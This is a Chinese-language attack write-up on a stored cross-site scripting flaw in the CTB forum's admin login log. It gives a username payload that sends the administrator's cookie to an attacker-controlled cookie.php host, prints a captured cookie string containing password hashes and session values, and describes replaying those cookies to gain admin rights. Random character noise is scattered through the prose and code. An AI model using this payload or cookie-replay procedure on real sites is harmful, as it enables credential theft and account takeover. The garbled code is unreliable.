CTB论坛再探

韩冰

在CTB论坛中对前台和后台登陆的情况都设置了一个日志记录供管理员查看，可以让管理员尽快发现论坛是否被人入侵。但是对于用户递交的数据没有进行任何处理就记录到了日志当中，我们可以通过递交特殊的语句来进行跨站攻击，从而直接得到密码。 % S" t/ y# ?8 m: P 　　我们看看admin目录下的login.php文件的日志处理部分的代码： % ?& T* K3 Z; s. N; m2 J 代码: 7 V; t! d) u" T9 B' o9 W-------------------------------------------------------------------------------- //后台管理员登陆日志 function adminLoginLog($check="ok") { 6 p; |: @; u( W* G& \! ` if($this->set[logRecord] == "N"){ return false; } $msgArray[phpCode] = $this->code; ; v6 \$ i: F7 ^! e9 } //判断文件大小是否需要清空 if (filesize("../".$this->set['dataPath']."/log_adminlogin.php") > $this->set['logRecordSize']){ 5 a$ w- b! F- k; ? $this->file = "../".$this->set['dataPath']."/log_adminlogin.php"; * U5 D1 i; R9 ?$ E6 O2 ] $this->null_write(""); } //登陆错误 //省去部分代码........ * D6 i5 L# l3 A3 Q2 Y1 m% A7 p //登陆失败 else { U- t( H, e3 P a) x, o- O $msgArray[loginMode] = 0; $msgArray[loginId] = $this->input['userName']; 9 W' e6 V+ m$ V/ h $msgArray[wrongMsg] = $check; $msgArray[userIp] = $this->ip; $ X8 S# `2 r$ ^8 [' J# K $msgArray[loginTime] = time(); % x4 D5 L$ h3 M( X% O" K $msgArray[temp1] = ""; //备用 + W$ S7 a: x* W5 G$ S4 u. [- h k3 V $msgArray[temp2] = ""; //备用 $this->file = "../".$this->set['dataPath']."/log_adminlogin.php"; ' X5 c8 E! `4 B $this->add_line($msgArray); # D- C. A% Z; g$ h/ U( D4 |2 y; R } % p; @! F6 B5 p5 y} ; z( [2 S$ @; A e2 @) C* X6 ~5 ^) f7 K-------------------------------------------------------------------------------- 0 m2 d+ V" @/ Z 　　从代码上看我们递交的用户名等信息既不会进行任何过滤也无论正确与否都会被保存到log_adminlogin.php里去，当管理员登陆到后台查看日志的时候就会显示出log_adminlogin.php里面记录的登陆信息，我们也就可以通过这个方法来得到管理员的ID和密码等信息。 3 G" v( D+ F( [9 q9 l- Y 0 Y" Y4 O8 e# l$ c' d　　我们打开后台登陆页面，在用户名那里输入： # D7 E$ {, |8 \- p# {$ u! q4 q 代码: -------------------------------------------------------------------------------- <img src="javascript:window.open('http://192.168.1.1/cookie.php?'+document.cookie)"> . J9 R8 z' O! |; O( d8 ~) k7 d-------------------------------------------------------------------------------- 4 s, }1 E* F% S0 j- H3 @3 N . w, j% |! E$ H' H* K5 G　　因为无论登陆成功否，程序都会进行记录，所以密码我们可以随便填。其中192.168.1.1为我们放置cookie.php的网址，cookie.php为一个可以获得cookie信息的PHP文件。现在我们要做的就是等了，只要管理员一查看后台登陆日志，我们的PHP程序就会把他的COOKIE截取下来。 % P& f) s) m. P& H% r　　让我们看看截取到的文件内容： 4 M3 T4 c1 ? F引用: 5 E/ o8 @ U' P+ u& q-------------------------------------------------------------------------------- 1 Y# ~# u4 Y& C! ~& q( h 8 f7 U- C+ t& c; Actb_user_login=ctb;%20ctb_user_pass=ce445102682e75bf533d44e1afc38a90;%20ctb_login_mode=1;%20eremite=0;%20skins=2;%20fylinklinkfylogin=cpb;%20userpass=2BA2A8AC968A7A2B0A7BAA7F2FEF18D2;%20username=sniper;%20Dwebdv=userid=1&usercookies=2&userhidden=&password=0reu3g775VrY7458&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=3980383;%20TZ=480;%20PHPSESSID=d8765179dc4f3a8708515a031216e503 9 e0 ^2 T% `* i- w -------------------------------------------------------------------------------- 　　我们需要只有ctb_user_login、ctb_user_pass和ctb_login_mode三个就可以得到前台管理权限了，有了这些信息，我们要获得前台管理员权限就非常容易，用IECookieView找到我们要编辑的COOKIE，把相应的部分替换掉，保存后再进入该站点你就是前台管理员了。 7 x, `1 [/ p" H. w 　　很简单的我们就得到了论坛的管理权限，如果被人利用，那么相信后果是非常严重的，希望用CTB论坛的朋友关注他们的官方站点的补丁发布情况，尽快修补该漏洞，以免造成不必要的损失。